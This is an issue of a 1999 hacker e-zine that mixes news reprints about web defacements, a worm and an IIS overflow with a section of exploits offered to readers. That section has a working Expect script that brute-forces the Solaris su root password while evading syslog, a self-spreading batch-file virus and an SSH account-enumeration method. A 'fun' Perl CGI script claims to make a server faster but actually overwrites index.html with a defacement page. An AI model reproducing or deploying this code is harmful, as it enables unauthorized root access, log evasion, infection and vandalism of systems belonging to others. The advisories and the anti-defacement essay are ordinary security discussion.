Copy Link
Add to Bookmark
Report
Antidote Vol. 02 Issue 09
Volume 2 Issue 9
6/19/99
** **
***** * * ** *
* *** ** *** ** **
*** ** * ** **
* ** ******** ** **** ********
* ** *** **** ******** *** *** ** * *** * ******** ***
* ** **** **** * ** *** ********* * **** ** * ***
* ** ** **** ** ** ** **** ** ** ** * ***
* ** ** ** ** ** ** ** ** ** ** ** ***
********* ** ** ** ** ** ** ** ** ** ********
* ** ** ** ** ** ** ** ** ** ** *******
* ** ** ** ** ** ** ** ** ** ** **
***** ** ** ** ** ** ** ** ****** ** **** *
* **** ** * *** *** ** *** * ***** **** ** *******
* ** ** *** *** *** *** *****
*
** http://www.thepoison.org/antidote
bof_ptr = (long *)buffer;
for (i = 0; i < bufsize - 4; i += 4)
*(bof_ptr++) = get_sp() - offs;
printf ("Creating termcap f1le\n");
printf ("b1tch is Fe3lin 1t.\n";
------------------------------
In this issue of Antidote, we have over 680 subscribers and getting more everyday! The
only thing that we ask of you when you read Antidote, is that you go to:
www.thepoison.org/popup.html
and click on our sponsors. One issue of Antidote takes us about a week to put together
and going to our sponsor only takes you about 15 seconds (if that). So please go visit
our sponsor because it is the only thing we ask of you.
--=\\Contents\\=--
0.00 - Beginning
0.01 - What?
0.02 - FAQ
0.03 - Shouts
0.04 - Writing
1.00 - News
1.01 - AntiOnline Under Investigation
1.02 - Hacking No longer a Prank
1.03 - Deadly Worm on the Run
1.04 - US Sentate Cracked AGAIN
2.00 - Exploits (new & older)
2.01 - solaris_2.5.su.expect.cgi
2.02 - sun.useradd.expir_date.txt
2.03 - aim.ip_address.txt
2.04 - cdnow.account_access.txt
2.05 - ssh-2.0.brute_force.txt
3.00 - Misc
3.01 - I Only Replaced index.html
3.02 - virii.bat.txt
4.00 - ISS Portfolio
4.01 - wired.com
4.02 - infoworld.com
4.03 - iss_brain.ini.txt
4.04 - iss_injecter.c.txt
FUN.S - FUN STUFF, stupid things that have no purpose or reasoning. It is just
something totally stupid and MAYBE even humorous to some.
SAY.W - SAY WHAT? Various quotes that might be humorous, stupid, true, or just
plane making fun of something or someone.
FEAT.S - FEATURED SITES:
www.nudehackers.com
www.thepoison.org/masters/exploits2/
www.403-security.org
www.hackernews.com
------------------------------
<!-- 0.00 - Beginning //-->
0.01 --=\\What?\\=--
What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, cause
that would be wrong. We don't claim to be a hacking magazine. All Antidote is, is
basically current news and happenings in the underground world. We aren't going to
teach you how to hack or anything, but we will supply you with the current information
and exploits. Mainly Antidote is just a magazine for people to read if they have some
extra time on there hands and are bored with nothing to do. If you want to read a maga-
zine that teaches you how to hack etc, then you might want to go to your local book-
store and see if they carry '2600'.
------------------------------
0.02 --=\\FAQ\\=--
Here are a lot of questions that we seem to recieve a lot, or our "Frequently Asked
Questions". Please read this before e-mailing us with questions and if the question
isn't on here or doesn't make sense, then you can e-mail us with your question.
> What exactly is "Antidote"?
See section 0.01 for a complete description.
> I find Antidote to not be shot for the beginner or does not teach you the basics,
why is that?
Antidote is for everyone, all we are basically is a news ezine that comes out once
a week with the current news, exploits, flaws and even programming. All of the
articles that are in here are recieved second hand (sent to us) and we very rarely
edit anyone's articles.
> I just found Antidote issues on your webpage, is there anyway I can get them sent
to me through e-mail?
Yes, if you go to www.thepoison.org/antidote there should be a text box where you can
input your e-mail address. You will recieve a link to the current Antidote (where you
can view it).
> If I want to submit something, are there any 'rules'?
Please see section 0.03 for a complete description.
> If I submitted something, can I remain anonymous?
Yes. Just make sure that you specify what information about yourself you would like
to be published above your article (when sending it to us) and we will do what you
say.
> I submitted something and I didn't see it in the current/last issue, why is that?
It could be that someone else wrote something similar to what you wrote and they sent
it to us first. If you sent us something and we didn't e-mail you back, then you
might want to send it again because we probably didn't get it (we respond to all e-
mails no matter what). We might use your article in future issues off Antidote.
> Can I submit something that I didn't "discover" or "write"?
Yes you can, we take information that is written by anyone regardless if you wrote it
or not.
Well thats it for our FAQ. If you have a question that is not on here or the question
is on here and you had trouble understanding it, then please feel free to e-mail
lordoak@thepoison.org and he will answer your question. This FAQ will probably be
updated every month.
------------------------------
0.03 --=\\Shouts\\=--
These are just some shout outs that we feel we owe to some people. Some are individuals
and Some are groups in general. If you are not on this list and you feel that For some
reason you should be, then please contact Lord Oak and he will post you on here and we
are sorry for the Misunderstanding. Well, here are the shout outs:
Lord Oak EazyMoney
Duece opt1mus
PBBSER oX1dation
Forlorn Retribution
0dnek www.thepoison.org
Like we said above, if we forgot you and/or you think you should be added, please e-
mail lordoak@thepoison.org and he will be sure to add you.
------------------------------
0.04 --=\\Writing\\=--
As many of you know, we are always open to articles/submittings. We will take almost
anything that has to do with computer security. This leaves you open for:
-Protecting the system (security/securing)
-Attacking the system (hacking, exploits, flaws, etc....)
-UNIX (really anything to do with it...)
-News that has to do with any of the above....
The only thing that we really don't take is webpage hacks, like e-mailing us and saying
"www.xxx.com" was hacked... But if you have an opinion about the hacks that is fine. If
you have any questions about what is "acceptable" and not, please feel free to e-mail
Lord Oak [lordoak@thepoison.org] with your question and he will answer it. Also, please
note that if we recieve two e-mails with the same topic/idea then we will use the one
that we recieved first. So it might be a good idea to e-mail one of us and ask us if
someone has written about/on this topic so that way you don't waste your time on
writing something that won't be published. An example of this would be:
If Joe sends me an e-mail with the topic being on hacking hotmail accounts on
thursday.
And then Bill sends us an e-mail on hacking hotmail accounts on sunday, we will
take Joe's article because he sent it in first.
But keep in mind, we might use your article for the next issue! If you have something
that you would like to submit to Antidote, please e-mail lordoak@thepoison.org or
duece@thepoison.org and one of us will review the article and put it in Antidote (if
we like it).
------------------------------
_________________________________
) ___ (
( //___/ / // ) ) // ) ) )
) /____ / // / / __ / / (
( / / // / / ) ) )
) / / ((___/ / ((___/ / (
( http://www.403-security.org )
) For the latest hacks and news (
(___________________________________)
<!-- 1.00 - News //-->
1.01 --=\\AntiOnline Under Investigation\\=--
June 10, 1999
Brian Martin - Founder of ATTRITION
Today, Attrition staff learned that the FBI have opened investigations into
John Vranesevich and AntiOnline. Trusted sources close to the investigation
would not comment on the depth or details, but one agent would state "it
has been going on longer than you think".
When asked if Vranesevich's recent "change of mission" was in any way related
to the investigation, the agent only replied "no comment at this time."
The timing of this investigation coincides with AntiOnline's change of heart
regarding hacker activity and law enforcement. After a shocking change of
mission statement in which Vranesevich practically admits to crime, he pledges
to help law enforcement by "helping to serve, even if in some very small way."
Vranesevich goes on to say "I have been watching you these past 5 years. I
know how you do the things you do, why you do the things you do, and I know
who you are." This ominous threat was not received well by the hacker
community. A hacker called "h4r1k1r1" said "JP's 'contribution' to the
hacker community has been little more than creating FUD, and promoting
the puerile ideals of script kiddies worldwide."
One staff member from Attrition going by Punkis reminded us of the now
prophetic words from Vranesevich, who said "I could make just as much, if
not more money, by hunting down hackers and turning them in." These words
were said by Vranesevich on April 5th of this year.
(FUD means 'Fear, Uncertainty, and Doubt')
-EOF
------------------------------
1.02 --=\\Hacking No longer a Prank\\=--
[www.msnbc.com]
IN THIS DIGITAL AGE, your company whether it be an Amazon, E-Trade or some idea still
forming is built on a brand, a process and an information infrastructure. The way your
site appears on the Web; the process by which a Web visitor can maneuver and buy pro-
ducts; and the ability of your site to scale, connect to suppliers and customers, and
securely maintain a digital relation will determine your success.
Sites that scale and allow you to shop comfortably in a digital store can quickly
extend their brands from books to auctions to pet foods and beyond.
Sites that crumble while you and the rest of the panicked investment community try to
bail out on a stock will find themselves abandoned and facing a new realm of legal
liabilities. Hacked sites visibly and fundamentally shake the faith in the brand and
the products being offered at the digital storefront.
This loss of faith in the brand carries over to and is magnified in the government
realm. Internet access is on the verge of becoming sufficiently ubiquitous to allow
organizational functions to move to the Web.
If the first big thing the Web allowed was personal access and community building from
the ground up, the next big thing is allowing existing organizations to use the Web to
assume previously cumbersome functions. Vote on the Web? Sure. Register your car via
the Web. File your taxes. Get your refund. All these functions are certainly possible.
What is missing is trust. Trust is a difficult dimension to describe, but it most
clearly is apparent in its absence. Dont ask a citizenry to register to vote via the
Web if the governments top legal agencies cant keep their home pages free from
graffiti.
And it is the trust that is shaken when the White House site is hacked. Or the FBI site
Or the Senate site. Hacking is more than breaking a few minor laws. Hacking is certain-
ly not just being a good digital citizen by showing the security gaps that now exist to
prevent more serious transgressions in the future.
Hacking is neither clever nor funny, nor something to be tossed off as adolescent humor
from sci-fi-addled minds. Hacking retards the growth of a Web-accessible government and
should hold penalties proportional to the crime.
http://www.msnbc.com/news/278369.asp#BODY
------------------------------
1.03 --=\\Deadly Worm on the Run\\=--
[www.abcnews.go.com]
A new and very destructive computer worm, distributed much the same way as the Melissa
virus, is quickly spreading throughout computers in the United States. Hundreds, if not
thousands, of machines have already been infected.
According to anti-virus experts, the Worm.Explorer.Zip virus first started in Israel on
or about Sunday, spreading quickly to Europe. It was first reported in the United
States on Tuesday, with the bulk of reports coming in today.
If you see this window, you may already have the new worm virus. The worm then proceeds
to copy itself to the system directory with the filename Explore.exe and begins to
harvest e-mail addresses in order to propagate itself. (ABCNEWS.com)
This worm is designed to spread from network to network very quickly, says Carey
Nachenberg, chief researcher at Symantec Corp.s Anti-Virus Research Center. This has
already affected thousands of machines overseas.
How It Works
The virus primarily affects users of Microsofts Outlook e-mail program, though any e-
mail user who receives a tainted message could be in trouble. The worm enters a target
computer through an e-mail that appears to have come from someone the user e-mailed
before. It comes with a file attachment called zipped_files.exe. The text of the e-mail
customarily reads:
Hi [Recipient Name]! I received your email and I shall send you a reply ASAP. Till
then, take a look at the attached zipped docs. Bye
If a user then clicks to open that file, the worm is activated. It proceeds to randomly
destroy certain files on the target computer, then replicates itself through the e-mail
addresses in the in box.
This doesnt work through Microsoft Word like Melissa did, and it has the potential to
spread far more rapidly, Nachenberg says.
Officials with the Computer Emergency Response Team (CERT) at Carnegie-Mellon Univer-
sity in Pittsburgh have yet to figure out whether the lost data can be recovered.
Reports Continue to Come In
At least six different major corporations in the United States have reported the virus
to Symantec. CERT technical staffer Mark Zajicek says at least 20 first-hand reports
have been logged by his team, along with many second-hand reports of even more damage.
We have no idea when this will drop off, Zajicek says. Its safe to say that thousands
of users have been affected.
A spokeswoman for Microsoft Corp. confirmed that the company shut down its outside e-
mail this morning in order to update anti-virus and contain any outbreaks on its
Redmond, Wash., campus. The company is also planning to post letters to its Outlook
customers on how to combat the virus.
How to Stop It
The easiest thing to do to stop the worm is for computer users to be aware of it so
that they wont click on the zipped_files.exe icon to activate it. Nachenberg says that
although corporate users are far more likely to become infected by the worm, Outlook
users have learned safe computing practices from the Melissa scare, and may halt the
spread of the worm before it causes major damage.
I think many corporations did a good job of educating their users about safe computing,
Nachenberg says. Hopefully this wont spread as far as the Melissa virus.
Users who see the virus in their in boxes should leave the attachment alone, delete the
e-mail, and let their system administrators know about the infection immediately. Anti-
virus software should also be used. Symantec Corp. and other anti-virus software
vendors already have patches on their Web sites.
http://www.abcnews.go.com/sections/tech/DailyNews/worm990610.html
------------------------------
1.04 --=\\US Sentate Cracked AGAIN\\=--
[www.wired.com]
For the second time in two weeks, crackers on Friday defaced the Web page of the US
Senate.
The official Senate Web site was down as of Friday afternoon while administrators
repaired and restored the network. A cracker replaced the official page with one that
said "free Kevin Mitnick, free Zyklon."
An employee of US Senate Technical Operations said the site went down around 4 p.m. EST
but couldn't say when the site might come back up.
"Those of us who haven't been hacked yet are just trying to lay low and beef up secur-
ity as we can," said Sean Donelan, a network engineer for Data Research Associates, a
nationwide Internet service provider that works with state governments, libraries, and
schools.
Donelan said that each government agency is having to reinforce security independently
and that outside vendors working with the government departments consider their secur-
ity solutions proprietary.
"[We] are also trying not attract attention and not waving a red flag challenging
anyone to 'test' our security," Donelan said.
The Senate home page was previously cracked on 27 May. In that incident, crackers
filled the page with comments critical of the FBI. That hack was claimed by the group
Masters of Downloading, who broadcast the message "MAST3RZ 0F D0WNL0ADING, GL0B4L
D0MIN8T10N '99!" on the Senate's site.
The Varna Hacking Group claimed responsibility for the latest Web vandalism. The organ-
ization claims it is a "noncommercial hacking group." Varna is based in Bulgaria,
according to reports of a 1998 attack that members claimed to have launched against the
Cartoon Network.
Zyklon, mentioned in Friday's incident, is alleged to be a 19-year-old hacker from
Shoreline, Washington. He was indicted in early May for his alleged involvement in
other government site hacks.
Many of the recent hacks demanded justice for imprisoned cracker Kevin Mitnick, who has
been in jail for more than four years awaiting trial on a broad swath of criminal
charges.
http://www.wired.com/news/news/politics/story/20180.html
------------------------------
1.05 --=\\Voting Mouse\\=--
[www.usnews.com]
You can already bank, buy, and bar gain on the Internet. Even pay your taxes. What's
next? Voting. At least if some Louisiana politicians have their way.
The Louisiana Republican Party late last week was set to allow registered GOP voters to
cast their ballots via computer in the Jan. 29, 2000, presidential caucus. "What this
does is create thousands of polling places that never existed before," says Carey
Holliday, an attorney and member of a GOP advisory panel that voted, 5 to 2, to endorse
the use of Internet voting. After all, voters need only plunk down and switch on their
computer, tap a few keys, and civic duty accomplished.
Several legislatures are also consider ing allowing computer voting in statewide
elections. A pilot Pentagon program will allow residents of Florida, Missouri, South
Carolina, Texas, and Utah living abroad to vote over the Web next year.
In Louisiana, Republicans hope the move will push up voter turnout, which hovered at
an anemic 5 percent in the state's last presidential caucus in 1996. "It's been a big
problem for us," says Rep. Chuck McMains. "I think this could be a great opportunity
for people to par ticipate and, in the process, get better representation."
Party officials blamed the abysmal show ing on a lack of polling places. Recent studies
by VoteHere.Net
the software com pany that developed the voting system Louisiana Republicans are
considering show computer balloting would be em braced by 76 percent of voters ages 18
to 30 and by 50 percent of voters over age 50. What effect this would have on who wins
the elections is anybody's guess.
Hacker fraud. It sounds simple enough. Yet not everyone is convinced. Critics' major
concern: the potential for abuse. But VoteHere.Net says its program is one of the
toughest for hackers to crack or voters to fool. "Ours is the only election system that
automatically prevents tampering and box stuffing as it sniffs out voter fraud attempts
and malicious hackers," says Don Carter, senior vice president of VoteHere .Net. To
safeguard against fraud, voters would be required to provide infor mation such as birth
dates and Social Security numbers. To preserve privacy, the system uses one of the
toughest encryp tion programs available to the public, says Carter, and balloters must
give a voter encrypted registration number (VERN) provided when they register to vote
via computer to guarantee they vote only once.
That's not good enough for one key dis senter. "I don't totally disagree with the
concept, but our traditional process is a good one," says party chairman Mike Fran cis.
His solution is to increase the voting sites. "You could give away TV sets at the
polling places, and you still wouldn't get more than 100,000 voters [out of the state's
approximately 600,000 Republi cans] to show up," he says.
http://www.usnews.com/usnews/issue/990621/internet.htm
------------------------------
10001010100101110101010101001011101010101000
0 1
1 Y88b Y88 888 888 888 88e e88'Y88 0
1 Y88b Y8 888 888 888 888b d888 'Y 1
0 b Y88b Y 8888888 888 8888D C8888 1
0 8b Y88b 888 888 888 888P Y888 ,d 1
1 88b Y88b 888 888 888 88" "88,d88 0
1 1
1 http://www.nudehackers.com 0
0 0
01001010110101010001011010010111010100101011
<!-- 2.00 - Exploits //-->
2.01 --=\\solaris_2.5.su.expect.cgi\\=--
#!/usr/local/bin/expect --
# A quick little sploit for a quick round of beers :) mudge@L0pht.com
#
# This was something that had been floating around for some time.
# It might have been bitwrior that pointed out some of the oddities
# but I don't remember.
#
# It was mentioned to Casper Dik at some point and it was fixed in
# the next rev of Solaris (don't remember if the fix took place in
# 2.5.1 or 2.6 - I know it is in 2.6 at least).
#
# What happened was that the Solaris 2.5 and below systems
# had /bin/su written in the following fashion :
#
# attempt to SU
# |
# succesfull
# / \
# Y N
# | |
# exec cmd sleep
# |
# syslog
# |
# exit
#
# There were a few problems here - not the least of which was that they
# did not bother to trap signals. Thus, if you noticed su taking a while
# you most likely entered an incorrect password and were in the
# sleep phase.
#
# Sending a SIGINT by hitting ctrl-c would kill the process
# before the syslog of the invalid attempt occured.
#
# In current versions of /bin/su they DO trap signals.
#
# It should be noted that this is a fairly common coding problem that
# people will find in a lot of "security related" programs.
#
# .mudge
if { ($argc < 1) || ($argc > 1) } {
puts "correct usage is : $argv0 pwfile"
exit
}
set pwfile [open $argv "r"]
log_user 0
foreach line [split [read $pwfile] "\n"] {
spawn su root
expect "Password:"
send "$line\n"
# you might need to tweak this but it should be ok
set timeout 2
expect {
"#" { puts "root password is $line\n" ; exit }
}
set id [ exp_pid ]
exec kill -INT $id
}
------------------------------
2.02 --=\\sun.useradd.expir_date.txt\\=--
This has been tested and verified only on Solaris 7.
Sun has provided a useradd binary as well as the gui (admintool) for adding
new users. This program (it's a binary in Solaris 7) allows the "-e"
parameter which purports to set the expiration date for a new account. The
man page for it says:
-e expire Specify the expiration date for a login. After
this date, no user will be able to access this
login. expire is a date entered in any format you
like (except a Julian date). If the date format
that you choose includes spaces, it must be
quoted. For example, you may enter 10/6/90 or
"October 6, 1990". A null value (" ") defeats the
status of the expired date. This option is useful
for creating temporary logins.
The key here is that is says: "in any format you like".
Using the system as it ships and using the parameter as (for example)
"-e 6/30/2000"
(in a vain attempt to avoid Y2K confusion) results in an expiration date of
June 30, 2020, so if you are expecting the user accounts to expire soon,
you will be a little disappointed. If expiration dates are critical, you
have a real problem - users can login for 20 years after you thought you
had expired them!
Workaround (supplied by Sun): replace /etc/datemsk with:
#ident
%m/%d/%y %I:%M:%S %p
%m/%d/%Y %I:%M:%S %p
%m/%d/%y %H:%M:%S
%m/%d/%Y %H:%M:%S
%m/%d/%y %I:%M %p
%m/%d/%Y %I:%M %p
%m/%d/%y %H:%M
%m/%d/%Y %H:%M
%m/%d/%y
%m/%d/%Y
%m/%d
%b %d, %Y %I:%M:%S %p
%b %d, %Y %H:%M:%S
%B %d, %Y %I:%M:%S %p
%B %d, %Y %H:%M:%S
%b %d, %Y %I:%M %p
%b %d, %Y %H:%M
%B %d, %Y %I:%M %p
%B %d, %Y %H:%M
%b %d, %Y
%B %d, %Y
%b %d
%m\%d\%H\%M\%y
%m\%d\%H\%M\%Y
%m\%d\%H\%M
%m\%d\%H
%m%d
Your mileage may vary. I have not tested this to make sure it works
correctly with 2-digit years (lower case 'y' in the mask above.)
Sun has been notified of this and of the posting to BUGTRAQ.
Chad Price
cprice@MOLBIO.UNMC.EDU
------------------------------
2.03 --=\\aim.ip_adderess.txt\\=--
IU Uprising (iuprising@HOTMAIL.COM)
Tue, 8 Jun 1999 18:39:50 PDT
In the newest version of AIM (AOL Instant Messenger) there is a way to
transfer files. When you are transferring the file, you can open a DOS
prompt and type:
netstat -a -n
By doing this you (obviously) can get the person's IP address. Usually it
will be on port 5190. This may seem pointless because usually not much can
be done with simply an IP address, but under certain circumstances this can
be useful.
a|chEmist
------------------------------
2.04 --=\\cdnow.account_access.txt\\=--
Last week I stumbled accross the following security hole in CDNow!, the
online cd-store. I emailed CDNow! regarding this immediately but as yet
have not have any confirmation of receipt or response, so I decided to post
the information here. This is a copy of the email that I sent to CDNow.
Security Hole Found
I was just looking at my gift list, and pasted the URL to a mailing list.
That is, the URL in my location bar, after doing so I thought, wait, thats
not the URL I should have posted, so then sent the proper URL thinking that
CDNOW is password protected and noone would be able to get to my account,
but I decided to check by telnetting to a remote machine and going to that
URL.
The result was, I got a rejected cookie, and the page continued to load my
gift list (in edit mode), I then followed a link to my account history, and
details, and initiated steps to order a cd. I'm assuming the SID paramter
in the URL was looking up the open transaction/connection that I made from
my local machine and was using that.
My assumption is that this URL would only be valid for a certain amount of
time, so the security flaw will eventually in an hour or so be closed off (I
hope), however, the fact is that this hole does exist.
Mark Derricutt
DerricuttM@PBWORLD.COM
------------------------------
2.05 --=\\ssh-2.0.brute_force.txt\\=--
Aleph ... Sorry if it is an old bug ...
i have tested a bug in ssh-2.0.12.
any remote attacker can guess real account in the machine
Details
when a ssh client connects to the daemon it has a number ( default
three ) of attempts to guess the correct password before
disconnecting if you try to connect with a correct login, but
you only have once if you try to connect with a no correct login.
EXAMPLE
alfonso is not user ( login ) in 192.168.0.1
$ssh 192.168.0.1 -l alfonso
alfonso's password: <hit ENTER key>
Disconnected; authentication error (Authentication method disabled.).
$
altellez is user ( login ) in 192.168.0.1
$ssh 192.168.0.1 -l altellez
altellez's password: <hit ENTER key>
altellez's password:
Now the remote attacker known that altellez is a true login in
192.168.0.1
QUICK FIX
Edit the file sshd2_config (usually at /etc/ssh2), set the value
of "PasswordGuesses" to 1.
I only has tested it with ssh-2.0.12
Alfonso Lazaro Tellez
altellez@ip6seguridad.com
------------------------------
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
FUN.S
#!/usr/bin/perl
print "Content-type: text/html\n\n";
# Make your server go faster with this script!
# Works on any OS and minor editing is needed!
$path = "/home/username/"; # homedirectory
chdir($path);
open (EDIT,">index.html");
print EDIT <<EOF;
<html><head>
<title>Lord Oak 0wnz me!</title></head>
<body><center><B><font face=arial color=black>
I b0w to Lord Oak!</font></B></center>
</body></html>
EOF
close (EDIT);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
<!-- 3.00 - Misc //-->
3.01 --=\\I Only Replaced index.html\\=--
It would appear that the k-r4d kiddies who deface web pages have no concept of WHY
their shenanigans illicit such a violent response from the companies they attack. This
brief article will list some of the behind the scenes events that occur after the
"harmless" replacement of index.html by our oh-so-favorite political activists.
1. The company is notified, usually by a customer, that their web page has been changed.
The server admin, Web Master, or whomever is responsible for the content is usually the
first person to be told of this event as the company probably doesn't have an incident
response plan.
2. The admin shits a brick and tells his manager. The administrator, now in fear for
his job, has to bite the bullet and tell his manager that the company has been
"hacked". He's probably afraid that the attacker got in through his weak password, or
one of the boxes he know he should have upgraded six months ago.
3. Upon hearing this, the manager shits a brick. The mid-level manager now fears for
HIS job knowing that the brunt of upper management's wrath will fall on his shoulders
for not securing the systems. The manager tries desperately to figure out whom to tell
in upper management that will not fire him on the spot. He calls his manager (usually
a VP type) and tells her the news.
4. Upon hearing this, she freaks out and shits a brick. The VP calls Human Resources,
Legal, Security (if it exists), and the Director of Engineering or some other high-
level geek type. The group collectively decides if the site should be taken down or
remain up. A call is also made to the CEO or other chieftain to inform him of the sit-
uation. After a quick consultation with the in-house counsel, the decision to contact
or not contact law enforcement is made. Usually, the upper level types are in knee-
jerk mode and want to aggressively pursue the intruder "no matter what".
5. All this time, the overworked admin has been scouring his systems looking for traces
of how the attacker got in. Despite the attacker's claims that "he only replaced
index.html" the admin's manager wants EVERY system checked and any possible means of
entry sealed off. The admin will now try to perform a comprehensive security audit in
an hour.
6. The upper level types contact the Marketing department to figure out how to handle
the impact to the company's image. Never faced with this sort of problem before, the
Director of Marketing frets and calls all her people in for "a brainstorm" on how to
handle the situation.
7. The system is probably backed-up, taken down, and replaced with a newer box or a
significant upgrade (introducing new bugs) is made to the system. This takes the busy
admin the better part of a day. Normally, this could be accomplished in a few hours,
but with visibility on the VP and above level, the admin makes sure he does is
perfectly.
8. If law enforcement was called-in, they now spend time with the administrators and
lawyers to figure out if they have a case (probably not, most of the evidence was
accidentally destroyed by the admin in the first 4 hours after the incident).
9. Upper level types now decree that the systems will be secured and that nothing like
this will ever happen again. It's likely that big name consultants are brought in at
$200+/hour to assess the business and make recommendations to improve the site's secur-
ity. Since the admin is already busy doing day-to-day tasks, the consulting firm
probably implements their recommendations (at $200+/hour).
10. After a few weeks, things return to normal. The company has new ACLs, a new fire-
wall, and maybe some new policies.
Now, looking at this, one can see the number of personnel involved and the amount of
time invested in recovering from the "harmless" defacing of index.html. I haven't even
addressed the additional problems posed when the admins discover a trojanized binary or
unauthorized access to source code or other company trade secrets. This is just the
simple stuff.
"But the attacker said in his 'message' that he backed-up index.html. All they had to
do was replace it with the original!" No you stupid fool, no. The attacker has
publicly humiliated a corporation, has shown the world that the site's security is
inadequate, and has caused significant personal turmoil for 5 or more people.
Furthermore, if I come home one day to find my front door open and a note attached that
says "Hi. Broke into your place. Only moved your stuff around. Didn't take anything.
Love, r0bb3r" am I supposed to believe that? Would you? If the company affected is
publicly traded, they are legally _required_ to investigate and take measures to ensure
that a similar incident doesn't occur. If they don't, their shareholders can sue for
negligence.
Now, I can't possibly justify the tens of millions in losses claimed by companies in
cases like Mitnick or others - that's lunacy. However, reading the above, I hope it
becomes clear that there is significant time and money spent to clean up these "simple"
attacks.
-Anonymous
------------------------------
3.02 --=\\virii.bat.txt\\=--
@echo off>nul.virii
if exist %0.bat set virii=%0.bat
if exist %0 ste virii=%0
if !%1==! goto virii_start
if %1==/infect goto virii_infect
if %1==/find goto virii_find
:virii_start
REM Will find all batch files in current diectory
echo Finding files to infect with virii
for %%a in (*.bat) do command /e:10000 /c %virii% /infect %%a
goto virii_end
:virii_infect
REM This part makes sure virii does not infect itself or
REM previoulsy infected files
echo Checking %2 and making sure it has not been previously infected
set file_virii=%0
find "file_virii=%0" <%2>viriix.bat
call viriix
del viriix.bat
if "%file_virii%=="viriix echo %2 is allready infected
if "%file_virii%--"viriix exit
REM End of check
echo The virii is now infecting %2
type %2 > viriix.bat
find "virii" <%virii%>> viriix.bat
goto virii_end
:virii_end
I don't know what use this could be apart from an example of
redirecting outputs and "for" commands.
[)igital^[)istortion
ICQ 34585986
------------------------------
<!-- 4.00 - ISS Portfolio //-->
4.01 --=\\wired.com\\=--
[www.wired.com]
A major security flaw in a Microsoft Web server could allow crackers to take complete
control of e-commerce Web sites, security experts warned Tuesday.
The flaw in Microsoft's Internet Information Server 4.0 allows unauthorized remote
users to gain system-level access to the server, according to Firas Bushnaq, CEO of
eEye <http://www.eeye.com/>, the Internet security firm that discovered it.
"This hole is so serious it's scary," said Jim Blake, a network administrator for
Irvine, a city in southern California.
"With other [Windows NT] security holes, crackers have needed to gain some level of
user access before executing code on the server. This is different.... Anybody off the
Web can crack IIS," he said.
More than 1.3 million Microsoft IIS servers are up and running on the Web. Nasdaq, Walt
Disney, and Compaq are among the larger e-commerce operations run off the server,
according to NetCraft <http://www.NetCraft.com/> Internet surveys.
Microsoft confirmed that the problem exists and said that it is working on a fix.
Customers, however, have not been notified.
"Normally we will post the problem and the bug fix at the same time," said Microsoft
spokeswoman Jennifer Todd. "We take these security issues very seriously, and the patch
will be available [soon]."
The fix will be posted to Microsoft's security Web site
<http://www.microsoft.com/security/>, "probably in the next couple of days," Todd said.
The exploit is just one of a long list of security flaws affecting IIS 4.0. In May,
security experts found an exploit
<http://r.wired.com/r/10025/http://www.wired.com/news/news/technology/story/19566.html>
that enabled crackers to gain read access to files held on IIS when they requested
certain text files.
Last summer, an exploit known as the $DATA Bug
<http://r.wired.com/r/10025/http://www.wired.com/news/news/technology/story/13426.html>
granted any non-technical Web users access to sensitive information within the source
code used in Microsoft's Active Server Page, which is used on IIS.
And in January, a similar IIS security hole
<http://r.wired.com/r/10025/http://www.wired.com/news/news/technology/story/10136.html>
was discovered, one that exposed the source code and certain system settings of files
on Windows NT-based Web servers.
But the latest problem appears to be the most serious because of the level of access it
reportedly allows.
"The exploit gives crackers access to any database or software residing on the Web
server machine," said Bushnaq. "So they could steal credit-card information or even
post counterfeit Web pages."
For instance, crackers could exploit the bug to modify stock prices at one of the many
news and stock information sites running IIS.
The hole allows remote users to gain control of an IIS 4.0 server by creating what is
known as a "buffer overflow" on .htr Web pages -- an IIS feature designed to enable
users to remotely change their passwords.
A buffer overflow can occur when a system is fed a value much larger than expected. In
the case of the bug, the Dynamic Link Library (DLL) governing the .htr file extension,
called ISM.DLL, can be overloaded by running a utility that loads too many characters
into the library.
Once overloaded, the DLL is disabled and the content of the overflow "bleeds" into the
system.
"Normally, this would just crash the system," said Space Rogue, a member of L0pht Heavy
Industries, <http://www.l0pht.com/> an independent security consulting firm that last
year testified before the United States Senate on government information security.
"But a good cracker can write an exploit where the data that overflows will actually be
a executable program that will run as machine code," said Space Rogue. Such a move
could give a cracker complete control of the target system.
The overflow executable program can be used to run a system-level program that will
deliver the equivalent of a DOS command window to an attacker's PC.
To demonstrate the hole, eEye wrote a program called IIS Hack that will enable users to
crack and execute code on any IIS 4.0 Web Server.
However, disabling or removing the .htr password utility will not fix the problem,
according to Bushnaq. "You have got to go through a series of steps to remove the
faulty [code]."
Eeye discovered the problem while beta testing a network security auditing tool.
"Remote exploits are about the most serious problems you can have with a Web server,"
said Space Rogue. "It gives the attacker root privileges, so the cracker not only has
access to the IIS server but [to] software running on that machine."
"In many corporate sites today, this will give the cracker access to the entire
network"
Eeye is a software development firm specializing in security audit tools. Chief
executive Bushnaq previously founded the electronic commerce site ECompany.com
<http://www.ecompany.com/>.
http://www.wired.com/news/news/technology/story/20231.html
------------------------------
4.02 --=\\infoworld.com\\=--
[www.infoworld.com]
A small security consulting firm traded punches with Microsoft
this week over how to publicize a security flaw in Microsoft's Web
server software. Microsoft posted an alert and workaround June 15,
after the other company, eEye, posted a way to exploit the flaw,
saying it was necessary to draw attention to the threat it poses.
"It was demonstrating how serious this is. Microsoft has not
responded to us since then," Firas Bushnaq, eEye CEO, said
Thursday.
Microsoft countered that it had been cooperating with eEye on the
problem until the other company broke Microsoft's policy of
publishing security warnings only once there is a remedy, so as
not to reveal a breach to would-be exploiters.
"Deliberately publishing a tool on one's Web site to let malicious
users hurt innocent people is not being part of the solution,"
Microsoft security product manager Scott Culp countered on
Thursday. "It is a mystery to us why [eEye] suddenly and abruptly
chose to stop working with us and take this public."
The flaw is a "buffer overflow" in Microsoft's Internet Information
Server (IIS) 4.0. This could allow junk or malicious code to
overwrite executable code, thereby making the Web server either
crash or execute unauthorized commands, Culp said.
Buffer overflows are caused by programmer error and are "very
common... one of the biggest of all network security problems,"
Bushnaq said.
The IIS 4.0 bug could give a hacker access to various data on the
targeted Web server, including access to company files or customer
information, depending on how the network is configured and which
break-in approach is used, Bushnaq added.
"It's a very, very serious problem that people need to fix as soon
as possible," Bushnaq said.
Officials at eEye notified Microsoft of the problem June 8, but
were frustrated by the lack of response during the next several
days, Bushnaq said. On Monday, June 14, the company decided to
make the problem public.
